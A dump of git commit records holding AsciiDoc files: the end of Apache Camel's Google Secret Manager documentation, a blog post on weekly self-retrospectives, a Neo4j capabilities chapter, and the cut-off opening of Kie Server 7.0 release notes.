https:\/\/cloud.google.com\/docs\/authentication\/production[GCP default client instance], you'll need to provide the following env variables:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the `application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.aws.projectId = region\n----\n\nAt this point you'll be able to reference a property in the following way by using `gcp:` as prefix in the `{{ }}` syntax:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nWhere `route` will be the name of the secret stored in the GCP Secret Manager Service.\n\nYou could specify a default value in case the secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist, the property will fallback to \"default\" as value.\n\nAlso, you are able to get particular field of the secret, if you have for example a secret named database of this form:\n\n[source,json]\n----\n{\n \"username\": \"admin\",\n \"password\": \"password123\",\n \"engine\": \"postgres\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3128\",\n \"dbname\": \"db\"\n}\n----\n\nYou're able to do get single secret value in your route, like for example:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nOr re-use the property as part of an endpoint.\n\nYou could specify a default value in case the particular field of secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist or the secret exists, but the username field is not part of the secret, the property will fallback to \"admin\" as value.\n\nThere is also the syntax to get a particular version of the secret for both the approach, with field\/default value specified or only with secret:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the RAW route secret with version '1'.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the route secret value with version '1' or default value in case the secret doesn't exist or the version doesn't exist.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the username field of the database secret with version '1' or admin in case the secret doesn't exist or the version doesn't exist.\n\nThere are only two requirements: \n- Adding `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to do operation at secret management level (for example accessing the secret payload, or being admin of secret manager service)\n\n=== Automatic Camel context reloading on Secret Refresh\n\nBeing able to reload Camel context on a Secret Refresh, could be done by specifying the usual credentials (the same used for Google Secret Manager Property Function).\n\nWith Environment variables:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nor as plain Camel main properties:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.aws.projectId = projectId\n----\n\nOr by specifying a path to a service account key file, instead of using the default instance.\n\nTo enable the automatic refresh you'll need additional properties to set:\n\n[source,properties]\n----\ncamel.vault.gcp.projectId= projectId\ncamel.vault.gcp.refreshEnabled=true\ncamel.vault.gcp.refreshPeriod=60000\ncamel.vault.gcp.secrets=hello*\ncamel.vault.gcp.subscriptionName=subscriptionName\ncamel.main.context-reload-enabled = true\n----\n\nwhere `camel.vault.gcp.refreshEnabled` will enable the automatic context reload, `camel.vault.gcp.refreshPeriod` is the interval of time between two different checks for update events and `camel.vault.gcp.secrets` is a regex representing the secrets we want to track for updates.\n\nNote that `camel.vault.gcp.secrets` is not mandatory: if not specified the task responsible for checking updates events will take into accounts or the properties with an `gcp:` prefix.\n\nThe `camel.vault.gcp.subscriptionName` is the subscription name created in relation to the Google PubSub topic associated with the tracked secrets.\n\nThis mechanism while make use of the notification system related to Google Secret Manager: through this feature, every secret could be associated to one up to ten Google Pubsub Topics. These topics will receive \nevents related to life cycle of the secret.\n\nThere are only two requirements: \n- Adding `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to do operation at secret management level (for example accessing the secret payload, or being admin of secret manager service and also have permission over the Pubsub service)\n\n=== Google Secret Manager Producer operations\n\nGoogle Functions component provides the following operation on the producer side:\n\n- createSecret\n- getSecretVersion\n- deleteSecret\n- listSecrets\n\nIf you don't specify an operation by default the producer will use the `createSecret` operation.\n\n=== Google Secret Manager Producer Operation examples\n\n- createSecret: This operation will create a secret in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .setBody(constant(\"hello\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\n- getSecretVersion: This operation will retrieve a secret value with latest version in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=getSecretVersion\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\nThis will log the value of the secret \"test\".\n\n- deleteSecret: This operation will delete a secret\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=deleteSecret\")\n--------------------------------------------------------------------------------\n\n- listSecrets: This operation will return the secrets list for the project myProject\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=listSecrets\")\n--------------------------------------------------------------------------------\n\n\ninclude::spring-boot:partial$starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d97a81c9b88887a1323fc6993d3aaabe8b3b70ba","subject":"Update 2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","message":"Update 2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","new_file":"_posts\/2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","new_contents":"= Self-retrospective increases happiness of life\n\n:hp-image: \/covers\/self-retrospective-increases-happiness-of-life.jpeg\n:hp-tags: happiness, productivity, retrospective, life-hack\n:hp-alt-title: Self-retrospective increases happiness of life\n:published_at: 2016-03-18\n:tk-twitter: http:\/\/twitter.com\/[@Kacanovski]\n:self-retro-blog-post: http:\/\/tomek.kaczanowscy.pl\/2016\/01\/2016-year-self-retro\/[self-retros]\n:pomodores: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[pomodoro technique]\n\nRecently I read good advice by {tk-twitter} about doing {self-retro-blog-post}. After some thinking about the idea I decided to adopt it to my work and personal life. After six weeks of doing it I can share some insights from practical perspective.\n\n== Routine matters\nOne of the fundamental part of doing self-retros is making notes day by day. So it comes with need to have habit to track stuff at regular time. Because I am adopting self-retro also for personal stuff it was needed to do it twice a day - once before leaving the work and once on the very end of the day. Occasionally I forgot to write down part about personal stuff mainly due to fact that I was enjoying time with my kids, girlfriend and forgot to all the commitments. So I tried to recovery personal part on next morning and it was not so good due to fact that I usually forgot to something during to night.\n\n== Paper wins\nSecond main experience was that I was started with writing notes to paper notebook and it was quite useful. Instead of need to open PC or notebook\/tablet\/phone and try to use some application (I am not sure even if I would be able some useful app to find) it was super comfortable to use paper and some color markers. Because it\u2019s giving to you so many variants how the stuff will look it was funny to observe how is my approach changing in time. Once it were text notes, once notes with pictures, smileys and in other time it were illustrations without any text. After all I doubt that some application has such variability. And doing retrospective on that variable designed pages was also quite entertaining.\n\n== Sunday afternoon\nI did one retro on Friday afternoon, one on Monday morning and last four on Sunday afternoon. With Friday afternoon I had a problem because it was too long to have opportunity perform some action from list. And it wasn\u2019t taking into account personal part on the weekend. On Monday morning I was not satisfied with not available time something to do with personal items from list. So I believe that if you are doing self-retro also for personal stuff, the time for do it\u2019s Sunday afternoon. If you identify that you miss something personally important you still have some time to do something with it. For work stuff you have another perspective than doing it immediately after work with possible tiredness or frustration. And you are prepared for Monday morning with some list of items so you can start working immediately.\n\n== Retro itself\nFrom agile retrospectives I know that if you are not ending retro with list of things to be done, new approaches to be followed, tickets raised, it\u2019s not useful retrospective. So to have clear list with stuff needs to be done, stuff which has some priority was my first goal. Also I realized that it\u2019s almost necessary to praise myself for such good work on that week to have a feeling that my work\/personal balance is acceptable for my living. It\u2019s common that human have ability to forget bad things and doing self-retros helps with seeing things which didn\u2019t work properly and identify stuff for improvement. After rethinking achieved things on that particular week I had sometimes feeling that something important was missing. And realized that I forgot to do something which I had only in my mind for weeks but without placing such activity to any list I always forgot to do it. Nice.\n\n== Third week was most challenging\nI don\u2019t know exactly why, but I had problems with my routine on third week. Maybe it was because I was not seeing direct influence to my life, some boring tasks overwhelmed me or I obviously haven\u2019t done anything on some of the day. Or doubts about benefits of doing it. Weird. Fourth week was normal without anomalies and started to be so useful so don\u2019t understand much, maybe you can have some insights how it was possible.\n\n== What will be next?\nIf I can assess doing self-retro, it\u2019s quite interesting and useful technique if it\u2019s done on regular basis. It particularly helps achieve some work\/personal life balance. It successfully beat feeling \u201cI haven\u2019t done anything today\u201d. It helps focusing to important things firstly. So, useful, I recommend it for everyone. As I started with {pomodores} before doing self-retros, it was quite easy to adopt it because I had actual work done on detailed list already. I\u2019ll stick to these to enhancements of my life because it has proven that it works and helps but as always I am open to anything else which can be even more useful. Do you know about something better?\n\n*P.S.* If you enjoyed reading this blog post, could you do me favor and tweet it or\/and leave a comment? Thanks!","old_contents":"= Self-retrospective increases happiness of life\n\n:hp-image: \/covers\/self-retrospective-increases-happiness-of-life.jpeg\n:hp-tags: happiness, productivity, retrospective, life-hack\n:hp-alt-title: Self-retrospective increases happiness of life\n:published_at: 2016-02-20\n:tk-twitter: http:\/\/twitter.com\/[@Kacanovski]\n:self-retro-blog-post: http:\/\/tomek.kaczanowscy.pl\/2016\/01\/2016-year-self-retro\/[self-retros]\n:pomodores: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[pomodoro technique]\n\nRecently I read good advice by {tk-twitter} about doing {self-retro-blog-post}. After some thinking about the idea I decided to adopt it to my work and personal life. After six weeks of doing it I can share some insights from practical perspective.\n\n== Routine matters\nOne of the fundamental part of doing self-retros is making notes day by day. So it comes with need to have habit to track stuff at regular time. Because I am adopting self-retro also for personal stuff it was needed to do it twice a day - once before leaving the work and once on the very end of the day. Occasionally I forgot to write down part about personal stuff mainly due to fact that I was enjoying time with my kids, girlfriend and forgot to all the commitments. So I tried to recovery personal part on next morning and it was not so good due to fact that I usually forgot to something during to night.\n\n== Paper wins\nSecond main experience was that I was started with writing notes to paper notebook and it was quite useful. Instead of need to open PC or notebook\/tablet\/phone and try to use some application (I am not sure even if I would be able some useful app to find) it was super comfortable to use paper and some color markers. Because it\u2019s giving to you so many variants how the stuff will look it was funny to observe how is my approach changing in time. Once it were text notes, once notes with pictures, smileys and in other time it were illustrations without any text. After all I doubt that some application has such variability. And doing retrospective on that variable designed pages was also quite entertaining.\n\n== Sunday afternoon\nI did one retro on Friday afternoon, one on Monday morning and last four on Sunday afternoon. With Friday afternoon I had a problem because it was too long to have opportunity perform some action from list. And it wasn\u2019t taking into account personal part on the weekend. On Monday morning I was not satisfied with not available time something to do with personal items from list. So I believe that if you are doing self-retro also for personal stuff, the time for do it\u2019s Sunday afternoon. If you identify that you miss something personally important you still have some time to do something with it. For work stuff you have another perspective than doing it immediately after work with possible tiredness or frustration. And you are prepared for Monday morning with some list of items so you can start working immediately.\n\n== Retro itself\nFrom agile retrospectives I know that if you are not ending retro with list of things to be done, new approaches to be followed, tickets raised, it\u2019s not useful retrospective. So to have clear list with stuff needs to be done, stuff which has some priority was my first goal. Also I realized that it\u2019s almost necessary to praise myself for such good work on that week to have a feeling that my work\/personal balance is acceptable for my living. It\u2019s common that human have ability to forget bad things and doing self-retros helps with seeing things which didn\u2019t work properly and identify stuff for improvement. After rethinking achieved things on that particular week I had sometimes feeling that something important was missing. And realized that I forgot to do something which I had only in my mind for weeks but without placing such activity to any list I always forgot to do it. Nice.\n\n== Third week was most challenging\nI don\u2019t know exactly why, but I had problems with my routine on third week. Maybe it was because I was not seeing direct influence to my life, some boring tasks overwhelmed me or I obviously haven\u2019t done anything on some of the day. Or doubts about benefits of doing it. Weird. Fourth week was normal without anomalies and started to be so useful so don\u2019t understand much, maybe you can have some insights how it was possible.\n\n== What will be next?\nIf I can assess doing self-retro, it\u2019s quite interesting and useful technique if it\u2019s done on regular basis. It particularly helps achieve some work\/personal life balance. It successfully beat feeling \u201cI haven\u2019t done anything today\u201d. It helps focusing to important things firstly. So, useful, I recommend it for everyone. As I started with {pomodores} before doing self-retros, it was quite easy to adopt it because I had actual work done on detailed list already. I\u2019ll stick to these to enhancements of my life because it has proven that it works and helps but as always I am open to anything else which can be even more useful. Do you know about something better?\n\n*P.S.* If you enjoyed reading this blog post, could you do me favor and tweet it or\/and leave a comment? Thanks!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"daa0c8e24c001f131ff1317da2b916777bffee13","subject":"Fixed error in max number of properties.","message":"Fixed error in max number of properties.\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"manual\/src\/main\/resources\/reference\/capabilities\/cap-details.asciidoc","new_file":"manual\/src\/main\/resources\/reference\/capabilities\/cap-details.asciidoc","new_contents":"[[capabilities]]\nCapabilities\n============\n\n\/\/\/\/\/\/\/\/\/\nDetails, originally contained in the capabilities document.\n\/\/\/\/\/\/\/\/\/\n\n[[capabilities-data-security]]\n== Data Security ==\n\nSome data may need to be protected from unauthorized access (e.g., theft, modification). \nNeo4j does not deal with data encryption explicitly, but supports all means built into the Java programming language and the JVM to protect data by encrypting it before storing.\n\nFurthermore, data can be easily secured by running on an encrypted datastore at the file system level.\nFinally, data protection should be considered in the upper layers of the surrounding system in order to prevent problems with scraping, malicious data insertion, and other threats.\n\n[[capabilities-data-integrity]]\n== Data Integrity ==\n\nIn order to keep data consistent, there needs to be mechanisms and structures that guarantee the integrity of all stored data.\nIn Neo4j, data integrity is maintained for the core graph engine together with other data sources - see below.\n\n[[capabilities-core-graph-engine]]\n=== Core Graph Engine ===\n\nIn Neo4j, the whole data model is stored as a graph on disk and persisted as \npart of every committed transaction.\nIn the storage layer, Relationships, Nodes, and Properties have direct pointers to each other.\nThis maintains integrity without the need for data duplication between the different backend store files.\n \n[[capabilities-different-data-sources]]\n=== Different Data Sources ===\n\nIn a number of scenarios, the core graph engine is combined with other systems \nin order to achieve optimal performance for non-graph lookups.\nFor example, Apache Lucene is frequently used as an additional index system for text queries that would otherwise be very processing-intensive in the graph layer.\n\nTo keep these external systems in synchronization with each other, Neo4j provides \nfull Two Phase Commit transaction management, with rollback support over all data \nsources.\nThus, failed index insertions into Lucene can be transparently rolled back in all data sources and thus keep data up-to-date.\n\n[[capabilities-data-integration]]\n== Data Integration ==\n\nMost enterprises rely primarily on relational databases to store their data, but \nthis may cause performance limitations.\nIn some of these cases, Neo4j can be used as an extension to supplement search\/lookup for faster decision making.\nHowever, in any situation where multiple data repositories contain the same data, synchronization can be an issue.\n\nIn some applications, it is acceptable for the search platform to be slightly out \nof sync with the relational database.\nIn others, tight data integrity (eg., between Neo4j and RDBMS) is necessary. \nTypically, this has to be addressed for data changing in real-time and for bulk data changes happening in the RDBMS.\n\nA few strategies for synchronizing integrated data follows.\n\n[[capabilities-event-based-synchronization]]\n=== Event-based Synchronization ===\n\nIn this scenario, all data stores, both RDBMS and Neo4j, are fed with domain-specific \nevents via an event bus.\nThus, the data held in the different backends is not actually synchronized but rather replicated.\n\n[[capabilities-periodic-synchronization]]\n=== Periodic Synchronization ===\n\nAnother viable scenario is the periodic export of the latest changes in the RDBMS to \nNeo4j via some form of SQL query.\nThis allows a small amount of latency in the synchronization, but has the advantage of using the RDBMS as the master for all data purposes.\nThe same process can be applied with Neo4j as the master data source.\n\n[[capabilities-full-export]]\n=== Periodic Full Export\/Import of Data ===\n\nUsing the Batch Inserter tools for Neo4j, even large amounts of data can be imported \ninto the database in very short times.\nThus, a full export from the RDBMS and import into Neo4j becomes possible.\nIf the propagation lag between the RDBMS and Neo4j is not a big issue, this is a very viable solution.\n\n[[capabilities-availability]]\n== Availability and Reliability ==\n\nMost mission-critical systems require the database subsystem to be accessible at all \ntimes.\nNeo4j ensures availability and reliability through a few different strategies. \n\n[[capabilities-op-availability]]\n=== Operational Availability ===\n\nIn order not to create a single point of failure, Neo4j supports different \napproaches which provide transparent fallback and\/or recovery from failures.\n\n==== Online backup (Cold spare) ====\n\nIn this approach, a single instance of the master database is used, with Online \nBackup enabled.\nIn case of a failure, the backup files can be mounted onto a new \nNeo4j instance and reintegrated into the application.\n\n==== Online Backup High Availability (Hot spare) ====\n\nHere, a Neo4j \"backup\" instance listens to online transfers of changes from the \nmaster.\nIn the event of a failure of the master, the backup is already running \nand can directly take over the load.\n\n==== High Availability cluster ====\n\nThis approach uses a cluster of database instances, with one (read\/write) master \nand a number of (read-only) slaves.\nFailing slaves can simply be restarted and brought back online.\nAlternatively, a new slave may be added by cloning an existing one.\nShould the master instance fail, a new master will be elected by the remaining \ncluster nodes.\n\n[[capabilities-disaster]]\n=== Disaster Recovery\/ Resiliency ===\n\nIn cases of a breakdown of major part of the IT infrastructure, there need to be \nmechanisms in place that enable the fast recovery and regrouping of the remaining \nservices and servers.\nIn Neo4j, there are different components that are suitable to be part of a disaster recovery strategy.\n\n==== Prevention ====\n\n* Online Backup High Availability to other locations outside the current data center.\n* Online Backup to different file system locations: this is a simpler form of backup, \napplying changes directly to backup files; it is thus more suited for local backup scenarios.\n* Neo4j High Availability cluster: a cluster of one write-master Neo4j server and a number of read-slaves, getting transaction logs from the master.\n Write-master failover is handled by quorum election among the read-slaves for a new master.\n\n==== Detection ====\n\n* SNMP and JMX monitoring can be used for the Neo4j database.\n\n==== Correction ====\n\n* Online Backup: A new Neo4j server can be started directly on the backed-up files \nand take over new requests.\n* Neo4j High Availability cluster: A broken Neo4j read slave can be reinserted into the cluster, getting the latest updates from the master.\n Alternatively, a new server can be inserted by copying an existing server and applying the latest updates to it.\n\n[[capabilities-capacity]]\n== Capacity ==\n\n[[capabilities-file-sizes]]\n=== File Sizes ===\n\nNeo4j relies on Java's Non-blocking I\/O subsystem for all file handling.\nFurthermore, while the storage file layout is optimized for interconnected data, Neo4j does not require raw devices.\nThus, filesizes are only limited by the underlying operating system's capacity to handle large files.\nPhysically, there is no built-in limit of the file handling capacity in Neo4j.\n\nNeo4j tries to memory-map as much of the underlying store files as possible.\nIf the available RAM is not sufficient to keep all data in RAM, Neo4j will use buffers in some cases, reallocating the memory-mapped high-performance I\/O windows to the regions with the most I\/O activity dynamically.\nThus, ACID speed degrades gracefully as RAM becomes the limiting factor.\n\n[[capabilities-read-speed]]\n=== Read speed ===\n\nEnterprises want to optimize the use of hardware to deliver the maximum business value \nfrom available resources.\nNeo4j's approach to reading data provides the best possible usage of all available hardware resources.\nNeo4j does not block or lock any read operations; thus, there is no danger for deadlocks in read operations and no need for read transactions.\nWith a threaded read access to the database, queries can be run simultaneously on as many processors as may be available.\nThis provides very good scale-up scenarios with bigger servers.\n\n[[capabilities-write-speed]]\n=== Write speed ===\n\nWrite speed is a consideration for many enterprise applications.\nHowever, there are two different scenarios:\n\n. sustained continuous operation and\n. bulk access (e.g., backup, initial or batch loading).\n\nTo support the disparate requirements of these scenarios, Neo4j supports two modes of writing to the storage layer.\n\nIn transactional, ACID-compliant normal operation, isolation level is maintained and \nread operations can occur at the same time as the writing process.\nAt every commit, the data is persisted to disk and can be recovered to a consistent state upon system failures.\nThis requires disk write access and a real flushing of data.\nThus, the write speed of Neo4j on a single server in continuous mode is limited by the I\/O capacity of the hardware.\nConsequently, the use of fast SSDs is highly recommended for production scenarios.\n\nNeo4j has a Batch Inserter that operates directly on the store files.\nThis mode does not provide transactional security, so it can only be used when there is a single write thread.\nBecause data is written sequentially, and never flushed to the logical logs, huge performance boosts are achieved.\nThe Batch Inserter is optimized for non-transactional bulk import of large amounts of data. \n\n[[capabilities-data-size]]\n=== Data size ===\n\nIn Neo4j, data size is mainly limited by the address space of the primary keys for Nodes, Relationships, Properties and RelationshipTypes.\nCurrently, the address space is as follows:\n\n|=========\n| nodes | 2^35^ (∼ 34 billion) \n| relationships | 2^35^ (∼ 34 billion) \n| properties | 2^36^ to 2^38^ depending on property types (maximum ∼ 274 billion, always at least ∼ 68 billion)\n| relationship types | 2^15^ (∼ 32 000)\n|=========\n\n","old_contents":"[[capabilities]]\nCapabilities\n============\n\n\/\/\/\/\/\/\/\/\/\nDetails, originally contained in the capabilities document.\n\/\/\/\/\/\/\/\/\/\n\n[[capabilities-data-security]]\n== Data Security ==\n\nSome data may need to be protected from unauthorized access (e.g., theft, modification). \nNeo4j does not deal with data encryption explicitly, but supports all means built into the Java programming language and the JVM to protect data by encrypting it before storing.\n\nFurthermore, data can be easily secured by running on an encrypted datastore at the file system level.\nFinally, data protection should be considered in the upper layers of the surrounding system in order to prevent problems with scraping, malicious data insertion, and other threats.\n\n[[capabilities-data-integrity]]\n== Data Integrity ==\n\nIn order to keep data consistent, there needs to be mechanisms and structures that guarantee the integrity of all stored data.\nIn Neo4j, data integrity is maintained for the core graph engine together with other data sources - see below.\n\n[[capabilities-core-graph-engine]]\n=== Core Graph Engine ===\n\nIn Neo4j, the whole data model is stored as a graph on disk and persisted as \npart of every committed transaction.\nIn the storage layer, Relationships, Nodes, and Properties have direct pointers to each other.\nThis maintains integrity without the need for data duplication between the different backend store files.\n \n[[capabilities-different-data-sources]]\n=== Different Data Sources ===\n\nIn a number of scenarios, the core graph engine is combined with other systems \nin order to achieve optimal performance for non-graph lookups.\nFor example, Apache Lucene is frequently used as an additional index system for text queries that would otherwise be very processing-intensive in the graph layer.\n\nTo keep these external systems in synchronization with each other, Neo4j provides \nfull Two Phase Commit transaction management, with rollback support over all data \nsources.\nThus, failed index insertions into Lucene can be transparently rolled back in all data sources and thus keep data up-to-date.\n\n[[capabilities-data-integration]]\n== Data Integration ==\n\nMost enterprises rely primarily on relational databases to store their data, but \nthis may cause performance limitations.\nIn some of these cases, Neo4j can be used as an extension to supplement search\/lookup for faster decision making.\nHowever, in any situation where multiple data repositories contain the same data, synchronization can be an issue.\n\nIn some applications, it is acceptable for the search platform to be slightly out \nof sync with the relational database.\nIn others, tight data integrity (eg., between Neo4j and RDBMS) is necessary. \nTypically, this has to be addressed for data changing in real-time and for bulk data changes happening in the RDBMS.\n\nA few strategies for synchronizing integrated data follows.\n\n[[capabilities-event-based-synchronization]]\n=== Event-based Synchronization ===\n\nIn this scenario, all data stores, both RDBMS and Neo4j, are fed with domain-specific \nevents via an event bus.\nThus, the data held in the different backends is not actually synchronized but rather replicated.\n\n[[capabilities-periodic-synchronization]]\n=== Periodic Synchronization ===\n\nAnother viable scenario is the periodic export of the latest changes in the RDBMS to \nNeo4j via some form of SQL query.\nThis allows a small amount of latency in the synchronization, but has the advantage of using the RDBMS as the master for all data purposes.\nThe same process can be applied with Neo4j as the master data source.\n\n[[capabilities-full-export]]\n=== Periodic Full Export\/Import of Data ===\n\nUsing the Batch Inserter tools for Neo4j, even large amounts of data can be imported \ninto the database in very short times.\nThus, a full export from the RDBMS and import into Neo4j becomes possible.\nIf the propagation lag between the RDBMS and Neo4j is not a big issue, this is a very viable solution.\n\n[[capabilities-availability]]\n== Availability and Reliability ==\n\nMost mission-critical systems require the database subsystem to be accessible at all \ntimes.\nNeo4j ensures availability and reliability through a few different strategies. \n\n[[capabilities-op-availability]]\n=== Operational Availability ===\n\nIn order not to create a single point of failure, Neo4j supports different \napproaches which provide transparent fallback and\/or recovery from failures.\n\n==== Online backup (Cold spare) ====\n\nIn this approach, a single instance of the master database is used, with Online \nBackup enabled.\nIn case of a failure, the backup files can be mounted onto a new \nNeo4j instance and reintegrated into the application.\n\n==== Online Backup High Availability (Hot spare) ====\n\nHere, a Neo4j \"backup\" instance listens to online transfers of changes from the \nmaster.\nIn the event of a failure of the master, the backup is already running \nand can directly take over the load.\n\n==== High Availability cluster ====\n\nThis approach uses a cluster of database instances, with one (read\/write) master \nand a number of (read-only) slaves.\nFailing slaves can simply be restarted and brought back online.\nAlternatively, a new slave may be added by cloning an existing one.\nShould the master instance fail, a new master will be elected by the remaining \ncluster nodes.\n\n[[capabilities-disaster]]\n=== Disaster Recovery\/ Resiliency ===\n\nIn cases of a breakdown of major part of the IT infrastructure, there need to be \nmechanisms in place that enable the fast recovery and regrouping of the remaining \nservices and servers.\nIn Neo4j, there are different components that are suitable to be part of a disaster recovery strategy.\n\n==== Prevention ====\n\n* Online Backup High Availability to other locations outside the current data center.\n* Online Backup to different file system locations: this is a simpler form of backup, \napplying changes directly to backup files; it is thus more suited for local backup scenarios.\n* Neo4j High Availability cluster: a cluster of one write-master Neo4j server and a number of read-slaves, getting transaction logs from the master.\n Write-master failover is handled by quorum election among the read-slaves for a new master.\n\n==== Detection ====\n\n* SNMP and JMX monitoring can be used for the Neo4j database.\n\n==== Correction ====\n\n* Online Backup: A new Neo4j server can be started directly on the backed-up files \nand take over new requests.\n* Neo4j High Availability cluster: A broken Neo4j read slave can be reinserted into the cluster, getting the latest updates from the master.\n Alternatively, a new server can be inserted by copying an existing server and applying the latest updates to it.\n\n[[capabilities-capacity]]\n== Capacity ==\n\n[[capabilities-file-sizes]]\n=== File Sizes ===\n\nNeo4j relies on Java's Non-blocking I\/O subsystem for all file handling.\nFurthermore, while the storage file layout is optimized for interconnected data, Neo4j does not require raw devices.\nThus, filesizes are only limited by the underlying operating system's capacity to handle large files.\nPhysically, there is no built-in limit of the file handling capacity in Neo4j.\n\nNeo4j tries to memory-map as much of the underlying store files as possible.\nIf the available RAM is not sufficient to keep all data in RAM, Neo4j will use buffers in some cases, reallocating the memory-mapped high-performance I\/O windows to the regions with the most I\/O activity dynamically.\nThus, ACID speed degrades gracefully as RAM becomes the limiting factor.\n\n[[capabilities-read-speed]]\n=== Read speed ===\n\nEnterprises want to optimize the use of hardware to deliver the maximum business value \nfrom available resources.\nNeo4j's approach to reading data provides the best possible usage of all available hardware resources.\nNeo4j does not block or lock any read operations; thus, there is no danger for deadlocks in read operations and no need for read transactions.\nWith a threaded read access to the database, queries can be run simultaneously on as many processors as may be available.\nThis provides very good scale-up scenarios with bigger servers.\n\n[[capabilities-write-speed]]\n=== Write speed ===\n\nWrite speed is a consideration for many enterprise applications.\nHowever, there are two different scenarios:\n\n. sustained continuous operation and\n. bulk access (e.g., backup, initial or batch loading).\n\nTo support the disparate requirements of these scenarios, Neo4j supports two modes of writing to the storage layer.\n\nIn transactional, ACID-compliant normal operation, isolation level is maintained and \nread operations can occur at the same time as the writing process.\nAt every commit, the data is persisted to disk and can be recovered to a consistent state upon system failures.\nThis requires disk write access and a real flushing of data.\nThus, the write speed of Neo4j on a single server in continuous mode is limited by the I\/O capacity of the hardware.\nConsequently, the use of fast SSDs is highly recommended for production scenarios.\n\nNeo4j has a Batch Inserter that operates directly on the store files.\nThis mode does not provide transactional security, so it can only be used when there is a single write thread.\nBecause data is written sequentially, and never flushed to the logical logs, huge performance boosts are achieved.\nThe Batch Inserter is optimized for non-transactional bulk import of large amounts of data. \n\n[[capabilities-data-size]]\n=== Data size ===\n\nIn Neo4j, data size is mainly limited by the address space of the primary keys for Nodes, Relationships, Properties and RelationshipTypes.\nCurrently, the address space is as follows:\n\n* 2\u02c635 (~ 34 billion) nodes \n* 2\u02c635 (~ 34 billion) relationships \n* 2\u02c636 (~ 68 billion) properties \n* 2\u02c615 (~ 32 000) relationship types \n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"957e9becc05ec4aefa11b22eef8bdc0dfc1d8b89","subject":"PLANNER-825: Mention OptaPlanner REST API changes in 7.0 release notes","message":"PLANNER-825: Mention OptaPlanner REST API changes in 7.0 release notes\n","repos":"manstis\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs","old_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/KieServer\/ReleaseNotes\/ReleaseNotesKieServer.7.0.0.Final-section.adoc","new_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/KieServer\/ReleaseNotes\/ReleaseNotesKieServer.7.0.0.Final-section.adoc","new_contents":"[[_kieserver.releasenoteskie.7.0.0]]\n= Breaking changes in Kie Server 7.0 from 